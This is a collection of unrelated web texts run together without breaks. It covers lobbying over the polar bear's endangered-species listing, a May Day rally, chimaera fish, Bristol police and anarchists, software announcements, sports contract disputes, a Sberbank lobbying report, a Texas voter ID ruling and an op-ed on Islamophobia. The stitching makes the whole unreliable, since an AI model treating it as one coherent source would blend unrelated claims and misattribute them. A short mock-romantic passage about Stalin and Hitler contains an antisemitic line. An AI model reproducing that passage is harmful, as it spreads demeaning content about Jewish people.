Sims, of the Western Business Roundtable, whose members include Shell, Marathon Oil, and the API (formerly the American Petroleum Institute), says it's possible that the administration may take a middle road, conferring ESA protection but not linking the polar bear's decline with global warming—effectively declawing the listing of its full regulatory impact. This outcome would be unlikely to please either side in this debate. “That doesn't mean that the next administration, starting in January 2009, won't redo the listing, and link the two,” Sims explains. “In my mind, it's only a matter of time. One way or another we're going to be in the soup.” While the groups opposed to the polar bear's ESA listing have argued that it will result in a flood of environmental lawsuits, these same groups are readying for their own legal onslaught.
According to Sims' January email, the lawsuit by Roy Innis, of the Congress of Racial Equality, will be central not only to the legal campaign conservative groups plan to wage against the polar bear listing, but to their media offensive as well. “Our plaintiff's action will give us a very high visibility national media platform on day one,” he wrote in his message. Sims went on to say that plans were in the works for a 15-city bus tour to promote the litigation and that Fox News' Sean Hannity “has committed to me that he will put our plaintiff and this issue front and center on his radio and television shows when we launch.” He continued, “We should be able to very quickly take over this issue from the radical enviro groups and place it squarely where it belongs: on the negative impacts this decision will have on the poor.”
A longtime energy lobbyist who once served as the communications director for the controversial energy task force headed by Vice President Dick Cheney, Sims told me that part of his organization's campaign would entail educating the public on the “weakness of the science underscoring this petition.”
Yet scientists have been fairly clear about the plight of the polar bear and its root causes. Among other studies showing that the polar bear and its habitat are in peril, government researchers with the US Geological Survey reported in September that due to melting sea ice caused by climate change, two-thirds of world's polar bear population could die off by 2050.
Nevertheless, during our conversation Sims told me that the “polar bear population is at one of its highest levels in nearly four decades”; that polar bears are actually “doing well”; and that the species has lived “quite nicely through periods, thank you very much, when there's no polar ice.”
As it happens, it's prime polar bear watching season, and many of the top experts in the field have decamped to the Arctic to study them. Among them is the University of Alberta's Andrew Derocher, who's currently in Tuktoyaktuk, on the Beaufort Sea in Canada's Northwest Territories. “It's looking to be one of the worst years I've seen up here in a long time,” he says. “It's probably an extension of the low ice year we saw last year in the Beaufort Sea, actually throughout the Arctic. We haven't done anywhere near what we'd normally do. We're just not seeing many bears here. I know from talking on email with Alaskan colleagues they're seeing something very similar this year as well.”
Derocher, a leading polar bear ecologist, first traveled to Tuktoyaktuk to study the bears more than 20 years ago. “It looks nothing, nothing like it did back then,” he says. “It was heavy, thick ice; it was cold; there were bears everywhere.” Derocher estimated that he and his colleagues are only able to cover about 20 percent of the ground they used to. The rest is open water and thin, broken ice too treacherous for the researchers to venture onto via helicopter. There's even a possibility that Derocher and his colleagues may depart the Arctic early this year. “If we shut down this program early, it's going to be because there are no bears around here, which is highly unusual. And there really is no ice for them to be on, so any bears that are in this area are really far away on the drifting pack ice.”
When I asked him what he made of the current debate over the polar bear in the US, he told me that he was yet to be convinced that listing the bear would “have any major change on current policies on a global basis that deal with the root factor of habitat loss, which is human-induced climate change.” That said, he believes the campaign to win the bear ESA protection is worthwhile if only as a means of putting a face on the climate crisis. “Polar bears as a species are something that people can relate to. It acts as a motivational factor for people to consider at least whether or not there are things they can do to change their behaviors to reduce their impact.”
The conservative activists and industry reps on the other side of this debate are well aware of the polar bear's power to tug at the heart strings and make the environmental effects of climate change tangible. If the polar bear does receive ESA protection, it's precisely this image that they plan to target. “Up until now, polar bears have been iconic for the environmental community,” says Sims. “I think once it becomes widely known how this polar bear listing is actually going to hurt average Americans and not help the polar bear, I think that iconic image is going to shift. And frankly, we're going to help do that.”
Photo by flickr user longhorndave used under a Creative Commons license.
NEW YORK – “Reclaim the history of May Day for the working class!” That was the message of the April 8 organization and mobilization meeting for the May Day March and Rally that will take place May 1 in Manhattan's Foley Square. Dozens of union locals, including SEIU 32 BJ and 1199, the United Federation of Teachers, Transport Workers Union Local 100, and peace and community groups have already endorsed it.
The demands are clear: an economic policy in the interest of the working class majority, the right to unionize and bargain collectively for all workers, full rights for immigrant workers, and jobs for all. All of this is part of the proposed platform for the May Day March and Rally.
The date is fitting for a rally that will highlight the needs of working people and immigrants. In 1884, the U.S. labor movement set May 1, 1886, as the day on which the eight-hour workday was to become standard. On that date, workers across the country – around half a million – went out on a general strike to demand the change in working hours. Rallies took place across the country, on that and following days.
On May 4, 1886, a rally in Chicago's Haymarket Square which united native-born and immigrant workers was disrupted by a bomb thrown by provocateurs, probably from the police. Police used this as an excuse to riot, killing at least a dozen people. They arrested the main rally organizers, and eight of them were put on trial for murder, though there was never any evidence presented that they were guilty of anything other than fighting for workers' rights. Four of those tried were executed; one committed suicide in his jail cell.
Since then, in commemoration of the rally, its martyrs, and the fight for the eight-hour day, May 1 has in most countries been declared a holiday celebrating the working class and honoring its struggles.
Kevin Lynch of RWDSU/UFCW Local 338 solidified the sentiment of all who attended the 2010 May Day rally organizing meeting. His message was: We know how we lost the day – the Cold War and McCarthyism robbed the working people of this country of our rich heritage, which goes back to the fight for the eight-hour workday in May of 1886.
Councilman Robert Jackson and several other City Council members attended along with liaisons from State Assembly members Tom Duane and Rory Lancman. The City Council is helping to mobilize for the event.
The unions are raising the funds for what promises to be a major rally: the UFT, for example, put $5,000 into the mix.
Labor and immigrant rights organizations are key players, but the organizing committee is courting, and receiving a warm reception from, local grassroots organizations. A clergy member who helped mobilize the March for America rally asked how his church could help. Veterans for Peace Chapter 34 has endorsed the event, and will be represented at the march and rally carrying a Vets for Peace flag. According to a representative of the vets, “this is the beginning of a great and momentous movement.”
“Aside from a great kick-off,” said the Vets for Peace representative, “it is always a great opportunity to reconnect and meet new people in the movement. After all, it's about coalition-building for a better community and world.”
Dan Margolis contributed to this article.
Photo: 2007 May Day immigrant rights rally in New York. http://www.flickr.com/photos/bosstweed/ / CC BY 2.0
This article is about the cartilaginous fish order. For the namesake genus, see Chimaera (genus) . For the mythological beast, see Chimera (mythology) . For other uses, see Chimera
Chimaeras[1] are cartilaginous fish in the order Chimaeriformes, known informally as ghost sharks, rat fish, spookfish or rabbit fish; the latter three names are not to be confused with rattails, Opisthoproctidae or Siganidae, respectively.
At one time a "diverse and abundant" group (based on the fossil record), their closest living relatives are sharks, though their last common ancestor with sharks lived nearly 400 million years ago.[2] Today, they are largely confined to deep water.[3]
Description and habits [ edit ]
Chimaera egg case
Chimaeras live in temperate ocean floors down to 2,600 m (8,500 ft) deep, with few occurring at depths shallower than 200 m (660 ft). Exceptions include the members of the genus Callorhinchus, the rabbit fish and the spotted ratfish, which locally or periodically can be found at relatively shallow depths. Consequently, these are also among the few species from the Chimaera order kept in public aquaria.[4] They have elongated, soft bodies, with a bulky head and a single gill-opening. They grow up to 150 cm (4.9 ft) in length, although this includes the lengthy tail found in some species. In many species, the snout is modified into an elongated sensory organ.[5]
Like other members of the class Chondrichthyes, chimaera skeletons are constructed of cartilage. Their skin is smooth and largely covered by placoid scales, and their color can range from black to brownish gray. For defense, most chimaeras have a venomous spine in front of the dorsal fin.
Chimaeras resemble sharks in some ways: they employ claspers for internal fertilization of females and they lay eggs with leathery cases. They also use electroreception to find their prey.[6] However, unlike sharks, male chimaeras also have retractable sexual appendages on the forehead (a type of tentaculum)[7] and in front of the pelvic fins.[5] The females lay eggs in spindle-shaped, leathery egg cases.[1]
They also differ from sharks in that their upper jaws are fused with their skulls and they have separate anal and urogenital openings. They lack sharks' many sharp and replaceable teeth, having instead just three pairs of large permanent grinding tooth plates. They also have gill covers or opercula like bony fishes.[5]
Classification [ edit ]
In some classifications, the chimaeras are included (as subclass Holocephali) in the class Chondrichthyes of cartilaginous fishes; in other systems, this distinction may be raised to the level of class. Chimaeras also have some characteristics of bony fishes.
A renewed effort to explore deep water and to undertake taxonomic analysis of specimens in museum collections led to a boom during the first decade of the 21st century in the number of new species identified.[2] They are 50 extant species in six genera and four families are described; an additional three genera (including the extinct genus Ischyodus) and two families are only known from fossils):
Phylogenetics [ edit ]
Tracing the evolution of these species has been problematic given the scarcity of good fossils. DNA sequences have become the preferred approach to understanding speciation.[8]
The order appears to have originated about 420 million years ago during the Silurian. The 39 extant species fall into three families—the Callorhinchids, Rhinochimaerids and Chimaerids with the callorhinchids being the most basal clade. The families appear to have diverged during the late Jurassic to early Cretaceous (170–120 mya).
Parasites [ edit ]
As other fish, chimaeras have a number of parasites. Chimaericola leptogaster (Chimaericolidae) is a monogenean parasite of the gills of Chimaera monstrosa; the species can attain 50 mm (2.0 in) in length.
See also [ edit ]
Image copyright Avon and Somerset Police Image caption The targeted cars were parked in Blackcurrant Drive, Perry Road and Brook Close in Long Ashton
Police in Bristol are using "Stasi tactics" to harass people who hold left-wing views, anarchist groups in the city have claimed.
The claims follow police efforts to track down those behind a series of arson and criminal damage offences.
Sam, from Bristol Defendant Solidarity (BDS), said: "It most certainly does look like harassment to the people on the receiving end of it."
Police admitted visiting peoples' homes and workplaces but denied harassment.
Police say they are searching for a suspect called Huw Norfolk - also known as "Badger" - in connection with the attacks.
'Quite forceful'
Referring to the secret police in the former East Germany, Sam, who did not want to give his full name, said: "That often repeated saying, 'If you've got nothing to hide, you've got nothing to fear' was invented by the Stasi.
"The tactics the police are using at the moment have quite a few resemblances to the tactics used by the Stasi and police forces throughout the world."
Eddie, another BDS member, said police had been visiting other anarchist organisations, "knocking on people's doors, going to people's houses, making wrongful arrests".
Workplaces and homes were also frequently visited and police were "quite forceful" with interrogations, he said.
Ch Supt Julian Moss, head of CID for Avon and Somerset Police, said: "If anybody has a complaint to make, it's important they come and talk to us and we would be happy to listen.
"We have given that offer and so far nobody's taken that up.
"We have been round to places of work to discuss anarchism and to understand the community better, that I am absolutely certain of. I think that is legitimate."
Introducing Zoey
Over the last few years the Ember project and community have grown, and along with it, the Ember brand. We took care and caution to craft an experience and feel that while exciting and ambitious, stayed friendly and approachable. As everyone knows, a big part of that is our friendly neighborhood mascot, the Tomster.
The time has come to expand the family. Introducing Zoey.
When chatting about the origins of the Tomster for an EmberConf talk last year, Jamie White and Tomster illustrator Lindsey Wilson had chuckled about how a mascot needed to be a little bit like the perfect pop song. Distinct, but just generic enough that all different sorts of people could see themselves in it, just like the one right lyric in the song makes it the anthem of a million different emotions and situations.
Tomster's done a great job of that until now, and with the addition of Zoey, even more amazing Ember developers will be able to see themselves in Ember.
While Tomster will always be the original friendly face of Ember, you'll start seeing Zoey pop up around town too. Stay tuned for some special Zoey swag at EmberConf, and help us welcome her to the family.
CINCINNATI, OH - AUGUST 25: Jimmy Clausen #2 of the Carolina Panthers throws a pass during an NFL preseason game against the Cincinnati Bengals at Paul Brown Stadium on August 25, 2011 in Cincinnati, Ohio. The Bengals won 24-13. (Photo by Joe Robbins/Getty Images) Jimmy Clausen. (Joe Robbins/Getty Images)
By Chris Emma-
LAKE FOREST (CBS) — Long after the Bears had departed Wednesday's practice in the Walter Payton Center, there was Jimmy Clausen with a football in hand.
Clausen dropped back, fired a bullet, then continued again and again. The work has been constant ever since he was signed by the Bears two weeks ago. There's no time to waste.
“Long nights staying up, early mornings getting up in the meeting room and on the weekends, as well,” Clausen said. “But that's what you have to do to catch up and get ready to go.”
This is a second chance for Clausen, the quarterback who showed up at the College Football Hall of Fame in a limousine, the heralded star from Notre Dame and the touted NFL prospect. And he was exiled from the league before really getting a chance.
After drafting Clausen in the second round of the 2010 draft, the Carolina Panthers pulled the plug on him after just 10 starts, moving in favor of top overall pick Cam Newton in 2011. The once-promising career of Clausen was put on hold.
“This league is all about opportunity and being in the right place at the right time,” Bears tackle Jermon Bushrod said. “You really don't know how things are going to shape up. You could be a four-time All-American in college and come here in the league and never play.”
Fortunes changed when Bears coach Marc Trestman called Clausen recently, putting his faith in the quarterback he trained out of college.
The Bears have an established starter in Jay Cutler, but they also have an opportunity at the backup spot. Clausen is committed to winning that job.
“He's working hard, and I think he likes the opportunity he has here,” Cutler said of Clausen. “He was a little humbled going through the process of being on the streets and then getting picked up again. He's got a great attitude.”
Added Trestman: “Jimmy has done a very good job, very maturely fit in and taken the place of trying to learn the offense. He's grinding at it.”
Ever since arriving in Chicago, it's been all football for Clausen. He had one week to learn the Bears' complex playbook before first taking the field with his new team, working through his audition for a training camp invitation. The studious efforts paid dividends, as Trestman confirmed Thursday that Clausen would be in Bourbonnais.
With mini-camp wrapped up at Halas Hall, the football isn't ending for Clausen. He's using the break to play catch-up.
“It's difficult learning the whole entire offense in a week-and-a-half to two weeks,” Clausen said. “That's what the off time is for — get back in the book, learn and get ready for training camp.”
Second chances don't come often in the NFL, but Clausen had fortune on his side. Perhaps he can follow the path of Josh McCown, whom Trestman worked into a highly paid starter one year after he was picked up off the scrap heap. At the very least, Clausen has an opportunity to revive his career.
“He's still here, he still has a chance, and you just never know,” Bushrod said. “He could catch the eye of someone here or another team. At the end of the day, I just wish him the best.”
Every extra throw and minute in front of the playbook can help Clausen ready for training camp. He wants a fair shot, something he doesn't feel he got in Carolina.
A fresh start brings new hope for NFL success for Clausen, but it may be his one last chance.
“It's do or die, per se,” he said. “I just got to go out there and compete. I know how to play the game of football; I've done it my entire life. I just have to learn the offense, go out there and compete, and make plays.”
Follow Chris on Twitter @CEmma670.
About
Meme came from 4chan in a thread started on the 28/12/11 since then it has appeared in other 4chan threads and funnyjunk. The macro image is taken from the ongoing strings of protests in Greece. A general form of this meme revolves around a Greek goliath with an equipped gasmask and a wooden stick going after several real-life and fictional characters The hilarity, or the lulz, stems from the implication of the included object or person being anticipatedly hit or beat up by this seemingly insane, or courageous, icon depending on the situation. From observation, Justin Bieber is by far his favorite target. The stealthier he is, usually the better the hilarity. Though, sometimes the targets are aware of him, and they will either run at or away from him at a variety of speed. Hilarity still ensures.
Six-part crossover between Valiant Comics and Image Comics published in 1993 and 1994. Instead of issue numbers the issues have different colors (Yellow, Blue, Black, and Red) and there is no particular reading order except for the bookend issues Deathmate Prologue and Deathmate Epilogue. The story features Solar and various Valiant Heroes on one side, and characters from Cyber Force, Gen 13, Youngblood, WildC.A.T.s, and Supreme on the Image side. The crossover suffered from scheduling issues as Image released their issues 6 months late.
Chapter Titles & Issue Colors (released by Valiant):
Deathmate Preview (I) - available in green
Deathmate Preview (II) - available in orange or pink
Deathmate Prologue
Deathmate Yellow
Deathmate Blue
Deathmate Tourbook
Chapter Titles & Issue Colors (released by Image):
Deathmate Black
Deathmate Red
Deathmate Epilogue
Note: Except for the previews (and the Tourbook), all six issues have Gold variant editions as well.
Last week, Microsoft announced the upcoming July 20th release date of Visual Studio 2015, which is set to be one of the more ambitious releases of Microsoft's integrated development environment. This latest edition will introduce support for new platforms, spanning from iOS and Android platforms, to game development through support for Unity, Unreal, and Cocos, and more.
The Visual Studio Engineering Team also announced today that Visual Studio 2015 will support sharing open source extensions hosted on GitHub within Visual Studio Gallery.
GitHub, the popular web-based Git repository hosting service, hosts millions of open source extensions used in software development. With the newly announced support for sharing open source extensions in Visual Studio Gallery, authors will be able to easily share their Github hosted extensions with others and gain more outlets for feedback and collaboration.
Robin Liu, Program Manager of Visual Studio China, says this is just one of the first steps in improving open source extensions in Visual Studio Gallery. Some of the other projects the Visual Studio team is planning are:
Pull extension description from ReadMe.md. Want to save your time on writing extension descriptions? With this change we will pull ReadMe content from your GitHub repo directly and populate the description on Visual Studio Gallery.
More extension statistical data. We have heard requests from you for easier ways to see statistical data for your extensions. The idea here is to not only show more statistical information on your extension page, but also provide a set of APIs for you to easily consume this data.
Show badges on your repo. On your repo a badge will show how many people downloaded your extension. We also think it will be fun if we can provide extension authors a way to generate badges similar to this:
Get rewards from your extension. Extending the reward element from badges, we also plan to provide a points and rewards system for extension authors.
Extension upload API. Want to have some APIs to upload extensions? Or even integrate with CI services to trigger an auto upload? This is also part of our improvement plan so keep an eye out for upcoming updates to the Gallery.
This latest news adds to the narrative of how Microsoft is following a more open path to meet developers, as well as customers, where they are at, as promised at both Build and Ignite conferences earlier this year. Given this trend in Microsoft news, the technology company will most likely continue to announce previously unanticipated support for cross platform development in hopes to gain momentum among developers as Windows 10 and universal apps launch later this month.
Share This
Further reading: GitHub
Georges St-Pierre's standing with the UFC largely remains a mystery. But as we arrive at the one-month mark since the fighter declared himself a free agent, one thing has been made clear: the French-Canadian star will not be getting the homecoming he desired.
While GSP's legal team remains hopeful that the welterweight kingpin can eventually come to terms with his longtime employer, the UFC's Dec. 10 pay-per-view card in Toronto has been ruled out.
“It's fair to say that negotiations for UFC 206 have failed, and Georges is OK with that,” said Eric Hochstadt, one of St-Pierre's attorneys and a partner in Weil's Litigation Department. “He certainly tried with the UFC's new management.”
Hochstadt and James Quinn, the head of Weil's Litigation Department, have been going back and forth with WME-IMG for months with the goal of securing a new contract for their client. Unfortunately, it sounds like the sports law specialists are still a ways away from striking a deal that will appease both sides.
“Look — Georges is ready to go if we can get this done,” Hochstadt said. “Hopefully, for the sport, for Georges, for fans, that can happen. At this rate (of negotiations), probably next year.”
While returning to the Octagon remains Option 1, Hochstadt reiterated that St-Pierre is in no way bound to terms of his old UFC contract — one that expired, according to his team, when the UFC failed to meet a deadline they imposed for a bout agreement. He also stressed that his client is in no way beholden to the MMA leader.
“He doesn't need the UFC,” Hochstadt said of St-Pierre. “If the new owners, William Morris-IMG, don't want him back and they try to block him from fighting elsewhere, he can then take the legal battle or decide to walk away and do other things.”
GSP was almost able to avoid this unfortunate situation before WME-IMG purchased the UFC in July. According to the fighter, his agent was closing in on a new deal with former UFC CEO Lorenzo Fertitta before the new owners pulled the plug on the proposal.
“I think we were close to an agreement at some point towards the end, until the big news arrived,” St-Pierre said on The MMA Hour last month. “The news was the UFC got sold, and we were told everything was put on ice until the new owners took charge. So we waited for weeks without any news from the new owners. Finally, the news came — the new owners told us Lorenzo's offer was off the table.”
Hochstadt reaffirmed that new ownership is the reason a new contract has not been agreed upon.
“Those are the bad guys here,” he said. “Under the prior management before William Morris-IMG we don't think any of this stuff would've happened. There would've been a deal reached, maybe even for UFC 206 in Toronto.”
Which, in a sense, puts things back at square one.
St-Pierre, whose layoff recently hit its three-year anniversary, continues to train at Tristar Gym in Montreal with the expectation of competing once again. His legal team continues to argue its case for a lucrative contract that accounts for his Under Armour sponsorship — one that conflicts with the UFC's exclusive Reebok deal. And WME-IMG continues to take a hardline stance with one of the sport's greatest athletes and ambassadors of all time.
Could this contract standoff eventually make its way to the courtroom?
With one antitrust lawsuit already hanging over their heads in Nevada, Hochstadt believes Ari Emanuel and co. will want to avoid having GSP's case progress to that stage. But if push comes to shove, he and Quinn — who has termed the UFC's restrictive contract model “a pretty nice form of slavery” — are prepared to participate in a battle that extends well beyond their high-profile fighter.
“If this is part of the broader movement for athletes to be able to stand up for themselves in the sport of mixed martial arts against the UFC, that's great,” Hochstadt said. “It really is unlike the other major sports where there's some degree of equality between the ownership and the athletes.”
Stalin and Hitler sat together intimately on the musty brown loveseat. Hitler looked at the walls filled with his art and a tear rolled down his face. Stalin cupped Hitler's face with his hand, and looked into his sparkling eyes. He wiped away the tear and softly said, "Adolf, those admissions people at the university are blind as a bat. Your art is beautiful to me." Hitler leaned his head against Stalin's uniformed shoulder and began to sob heavily. "Nein!" he choked between sobs, "My art is more rubbish than the jews!" Stalin sighed and stroked Hitler's shiny hair while kissing him lightly up his neck and behind his ear. "There, there Hitler, you are the most powerful man I know." They looked at each other deeply and knew then that it was true love.
We are happy to announce the availability of the Tabris SDK as a free download. Tabris, formerly known as RAP mobile, is a platform for building mobile apps for iOS and Android.
Tabris is based on Eclipse RAP and offers additional mobile clients built with native widgets. Combining native clients with server-side apps makes app development simple for Java developers without having to sacrifice platform specific look & feel and performance. Tabris offers a large set of UI Controls with SWT API.
The Tabris SDK contains everything a developer needs to build branded cross platform apps:
iOS Tabris Framework, Xcode Project Templates
Android Tabris Source Code, Android Project Templates
Tabris target platform, sample projects and documentation
For developers without access to (or interest in) Xcode and the Android SDK we provide a build-service for branded apps. The service allows you to specify an App Logo, and App Name and the declaration of the server-side app.
The current version 0.6 of the Tabris SDK is a developer preview. Check out http://developer.eclipsesource.com/tabris/ for short demo videos, a list of supported SWT APIs and much more information.
Today I am making a private side-project public I am working on for more than 1.5 years now. Back in 2015 I started working on a prototype of what I call Anbox today. It was born out of the idea of putting Android into a simple container based on LXC and bridging relevant parts over to the host operating system while not allowing any access to real hardware or user data. The Android applications should integrate well into the existing desktop environment like they were regular applications. There were quite a few problems to solve on the way to a really working implementation but it is now in a state that it makes sense to share it with a wider audience.
Anbox uses Linux namespaces (user, network, cgroup, pid, ..) to isolate the Android operating system from the host. For Open GL ES support Anbox takes code parts from the Android emulator implementation to serialize the command stream and send it over to the host where it is mapped on existing Open GL or Open GL ES implementations.
The source code is entirely available as open source. Most parts are licenses under the terms of the GPLv3 but a few are Apache-2.0 for compatibility reasons with code used from other projects.
Anbox itself is still in its early phase and is in a pre-alpha state where crashes and instability is expected. The next phase of development will focus on stability and bug fixing and will add more necessary features to integrated better with the host operating system.
If you're interested in Anbox you will find a lot more information on its website anbox.io. The source code of the project is hosted on Github.
If you're now curious how Anbox looks like in action, have a look at the following video:
Democratic super lobbyist Tony Podesta failed to register under the Foreign Agent Registration Act (FARA) when he agreed to represent Sberbank, Russia's largest bank.
Sberbank allegedly has close ties to Russia's intelligence services, The Daily Caller News Foundation Investigative Group has learned.
Marc Raimondi, the national security spokesman at the Department of Justice, confirmed to TheDCNF that Sberbank never registered with the department under FARA. It did not directly register nor was it registered through any other agency such as the Podesta Group.
“The FARA Registration Unit personnel conducted a search related to your questions and can confirm that the search terms — Sberbank CIB USA, Inc., or Sberbank — are not currently (nor previously have been) registered under FARA,” he informed TheDCNF in an email.
The lobbying group of Manatos & Manatos — Podesta's competition — did register with the Justice Department under FARA when it agreed to represent VTB Capital, Russia's second largest bank.
David Marin of the Podesta Group told TheDCNF it acted “appropriately” by instead filing with the U.S. Senate under the Lobbying Disclosure Act — or LDA. He justified the move, in part, because its contract was with Sberbank's New York branch.
“We filed appropriately under LDA because we were working for the U.S. subsidiary,” he told TheDCNF via email. Podesta's firm received $170,000 to lobby on behalf of the Russian bank for six months in 2016.
That justification was flatly rejected by Ronald A. Oleynik, a partner at the Holland & Knight law firm, who represents foreign clients that face economic sanctions imposed by the U.S. government like Sberbank and VTB Capital.
“FARA is quite clear you can't hide behind the fact that the U.S. subsidiary hired us rather than the foreign parent,” Oleynik told TheDCNF.
“Someone thought they were doing that because they thought they were clever,” he said. “Shame on them, but it doesn't change the requirement. It's not a loophole in any way to say, ‘Oh I'm doing it for a New York corporation, not for the foreign parent.'”
Sberbank was once known informally as the “KGB bank,” and now has a reputation for close ties to Russian President Vladimir Putin and to Russian intelligence services.
John Schindler, a former National Security Agency analyst and a former professor of the National War College, has charged Sberbank has operational ties to Russian intelligence.
Writing in an opinion article in the New York Observer last April, Schindler asserted that, “funds moving through Sberbank are regularly used to support clandestine Russian intelligence operations, while the bank uses its offices abroad as cover for the Russian Foreign Intelligence Service or SVR.”
“A NATO counterintelligence official explained that Sberbank, which has outposts in almost two dozen foreign countries, ‘functions as a sort of arm of the SVR outside Russia, especially because many of its senior employees are ‘former' Russian intelligence officers,” he said. “Inside the country, Sberbank has an equally cozy relationship with the Federal Security Service or FSB, Russia's powerful domestic intelligence agency.”
Sergey Aleksashenko, formerly the deputy chairman of the Central Bank of Russia and later the head of Merrill Lynch in Russia, agreed with Schindler's assessment.
“It is a long-time tradition that in any state-run bank there are people from intelligence and security services,” he told TheDCNF. “It's not a big surprise.” Aleksashenko currently is a guest fellow at the liberal Brookings Institution.
Roman Borisovich, who once headed Russia's largest insurance company and has been a banker in London and on Wall Street, told TheDCNF, “The bank is basically an extension of Kremlin power into the world of finance.”
Former U.S. Attorney Joseph DiGenova told TheDCNF Podesta should have registered with the Justice Department.
He said Sberbank's ties to Russian intelligence agencies clinched it. “It's all the more reason why they should have registered. They were representing a direct organ of the Russian government engaged in espionage.”
“The truth is you always err in favor of registration, but Podesta didn't want to register because it wouldn't look good, even for a Democrat. So, what they did was they didn't register.”
DiGenova was rueful over the double standard being applied about ties to Russia. “It's axiomatic that what is forbidden for Republicans is permitted for Democrats.”
It's also unclear whether the Sberbank lobbyists were truthful when they asserted the bank was facing a cash crunch because of economic sanctions.
A congressional source who sat in on the Sberbank presentations said that the paid lobbyist and Elena Teplitskaya, Sberbank's board chairman, both claimed they were facing serious cash flow problems because of the sanctions. He talked to TheDCNF only on the grounds of anonymity.
Teplitskaya claimed the bank might be unable to purchase $550 million worth of aircraft from Boeing, and that it also was facing difficulty competing in Europe because of its debt.
However, in a Feb. 22 meeting this year with Putin in the Kremlin, German Gef, Sberbank's CEO and Chairman, boasted they had the “most successful year ever.”
“As far as our financial results go, it was the bank's most successful year ever. We earned a net profit of 517 billion rubles, according to Russian accounting standards,” Gef told Putin.
Sberbank's New York office did not return calls by TheDCNF.
Follow Richard on Twitter
Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience. For licensing opportunities of our original content, please contact licensing@dailycallernewsfoundation.org.
AUSTIN, Texas (Reuters) - A U.S. appeals court struck down a Texas law on Wednesday requiring voters to show authorized identification before casting ballots, saying the measure violated the U.S. Voting Rights Act through its “discriminatory effects.”
The decision from the U.S. Court of Appeals for the Fifth Circuit pertained to one of a series of laws enacted in Republican-governed states requiring potential voters to show identification that Democrats saw as intended to disenfranchise minorities who typically support their party.
“We affirm the district court's finding that SB 14 (Texas Senate Bill 14) violates Section 2 of the Voting Rights Act through its discriminatory effect,” a three-judge panel from the New Orleans-based court said.
The measure was signed into law in 2011 by then Texas Governor Rick Perry, a Republican, and has been the subject of legal battles since then.
Plaintiffs argued the law would hit elderly and poorer voters, including minorities, hardest because they are less likely to have such identification.
The measure, which supporters say will prevent voter fraud, requires voters to present a photo identification such as a driver's license, passport or military ID card.
U.S. District Judge Nelva Gonzales Ramos ruled in October 2014 that the law, which was challenged by the administration of President Barack Obama and civil rights groups, was unlawful under the Voting Rights Act and U.S. Constitution in part because it discriminates against minority voters.
The Obama administration has been trying to counter a U.S. Supreme Court ruling in June 2013 that overturned parts of the Voting Rights Act. That ruling freed several states, mostly in the South, from strict federal oversight.
Texas Governor Greg Abbott said the state will continue to fight to keep the voter ID requirement.
“In light of ongoing voter fraud, it is imperative that Texas has a voter ID law that prevents cheating at the ballot box,” he said in a statement.
Critics contend that voter fraud is a miniscule problem overblown by Republicans for political purposes.
The American Civil Liberties Union, which filed an amicus brief in the case to strike down the law, hailed the decision that came near the 50th anniversary of the Voting Rights Act.
“It is fitting for the court to recognize that laws that deliberately make it harder for black and Latino Americans to vote have no place in our democracy,” said Sean Young, a staff attorney at the ACLU's Voting Rights Project.
Public Space is CBC Calgary's online portal for opinion. Dr. Ameer Farooq submitted this piece. He calls on Albertans to stand up to Islamophobia.
We moved to Calgary from Edmonton in July of 2014 for the start of my residency in general surgery at the University of Calgary. For my wife and I, this was our first real move away from our home. We suddenly were faced with the prospect of living in a new city with no friends or family.
Our fears were unfounded because, after moving to Tuscany in northwest Calgary, we quickly realized how lucky we were to live in such a loving neighbourhood.
Our neighbours, in particular, had the special ability to welcome people to this community. We traded food, and my wife and I loved hearing the sounds of children and their parents at the playground. By the time our daughter was born in April of 2015, my wife and I were reassured that we lived in an embracing neighbourhood like Tuscany. We could not think of a better place to raise our daughter.
Calgary police released this image and several others of two male suspects wanted in connection with anti-Muslim graffiti at the Tuscany LRT station in December 2015. Two men were later charged. (Calgary Police Service)
Anti-Muslim graffiti hits close to home
However, on the evening of Dec. 3, there was a disturbing incident near our home. That evening, the Tuscany LRT station — as well as a car — was vandalized with racist graffiti. The offender sprayed "kill the musilums [sic]" using paint. Emblazoned alongside the words were symbols of white supremacy.
Calgary police quickly described the incident as a hate crime. Two men were eventually arrested and charged with public mischief. The Crown is still looking at whether the men will face charges related to hate crime.
This incident in Calgary forms part of a broader pattern of Islamophobia across Canada. Recently, the mosque in Cold Lake, Alta., was — again — vandalized. The words "Go home" were spray-painted on the building. A mosque in Peterborough, Ont., was burned down. Even more troubling is the vitriol and violence being directed toward Muslim women, especially hijab-wearing women. Muslim women are now signing up for self-defence classes as a result.
I am worried for my wife
On a personal level, these incidents have affected the way that I live my everyday life. My wife wears the hijab and I worry that, every time she goes out of the house, she will be harassed or even hurt. While we as Muslims have all experienced the occasional Islamophobic slur in the past, in the wake of San Bernardino and the Paris attacks, it seems like Islamophobia is somehow justified now.
Amira Elghawaby, with the National Council of Canadian Muslims, put it this way in a recent article: "Islamophobia must be considered as offensive and as socially unacceptable as any other hate-mongering out there, whether anti-Semitism, racism, homophobia, or sexism."
Hatred has many manifestations
Amira Elghawaby is right. The hatred being displayed toward Muslims stems from the same roots as any other act of hatred. It is the same hate that the Nazis espoused towards Jews, or ISIS espouses towards the West. No surprise, then, that the vandals in Tuscany painted the swastika as well on the wall.
I can understand the fear that we all have — the fear that someone may try to hurt our loved ones because of some crazy ideas from sick and twisted minds.
It is in times like this that I call upon my fellow Albertans to fight that fear with compassion and communication. And Albertans have always stepped up to do precisely that.
People gather in front of a memorial in Paris to remember the 130 people killed in attacks on Nov. 13, 2015. Dr. Ameer Farooq says he feels like Islamophobia has somehow become justified in some people's minds in the wake of the San Bernardino and Paris attacks. (Thomas Samson/AFP/Getty Images)
Community response has been very encouraging — so far
When the mosque in Cold Lake was vandalized the first time, an entire community came together to undo the damage.
My neighbours and others in Tuscany similarly came together to post messages of love and support at the LRT station.
The next time that you hear someone shout out something Islamophobic on the street at a Muslim woman, as a Muslim lady told me about happened to her recently, be a good neighbour. Respond like like my neighbours in Tuscany.
In 2016, don't be a bystander to bullying and intimidation. Show those few amongst us who are filled with hate that love, indeed, does conquer all. Love thy neighbour, and stand up for those who need your support.
You can submit your ideas for the next Public Space by emailing us at publicspace@cbc.ca.
CBC Calgary will contact those who submit ideas that are being considered for publishing online. Submissions can no more than 800 words. The pieces that are posted represent the views of the author, not of the CBC.
Podcast:
Host: Dr. Shana A. Russell earned her PhD in American Studies from Rutgers University-Newark. She is a scholar of black women's labor and the daughter of four generations of domestic workers. She is inspired by black women who write, sing, shout, disrupt, and persevere.
Executive Producer: Tim Raphael
